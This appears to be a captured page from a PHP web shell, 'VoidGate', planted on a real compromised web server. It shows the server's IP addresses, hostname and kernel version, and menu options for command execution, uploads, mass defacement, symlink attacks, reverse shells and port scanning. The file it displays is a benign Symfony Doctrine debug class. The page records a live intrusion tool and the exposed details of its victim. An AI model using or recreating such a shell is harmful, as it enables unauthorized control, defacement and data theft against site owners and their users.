ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
logercm
/
dev.loger.cm
/
vendor
/
symfony
/
doctrine-bridge
/
Middleware
/
Debug
/
Viewing: Query.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Bridge\Doctrine\Middleware\Debug; use Doctrine\DBAL\ParameterType; /** * @author Laurent VOULLEMIER <laurent.voullemier@gmail.com> * * @internal */ class Query { private $params = []; private $types = []; private $start; private $duration; private $sql; public function __construct(string $sql) { $this->sql = $sql; } public function start(): void { $this->start = microtime(true); } public function stop(): void { if (null !== $this->start) { $this->duration = microtime(true) - $this->start; } } /** * @param string|int $param * @param mixed $variable */ public function setParam($param, &$variable, int $type): void { // Numeric indexes start at 0 in profiler $idx = \is_int($param) ? $param - 1 : $param; $this->params[$idx] = &$variable; $this->types[$idx] = $type; } /** * @param string|int $param * @param mixed $value */ public function setValue($param, $value, int $type): void { // Numeric indexes start at 0 in profiler $idx = \is_int($param) ? $param - 1 : $param; $this->params[$idx] = $value; $this->types[$idx] = $type; } /** * @param array<string|int, string|int|float> $values */ public function setValues(array $values): void { foreach ($values as $param => $value) { $this->setValue($param, $value, ParameterType::STRING); } } public function getSql(): string { return $this->sql; } /** * @return array<int, string|int|float}> */ public function getParams(): array { return $this->params; } /** * @return array<int, int> */ public function getTypes(): array { return $this->types; } /** * Query duration in seconds. */ public function getDuration(): ?float { return $this->duration; } public function __clone() { $copy = []; foreach ($this->params as $param => $valueOrVariable) { $copy[$param] = $valueOrVariable; } $this->params = $copy; } }
Coded With 💗 by
0x6ick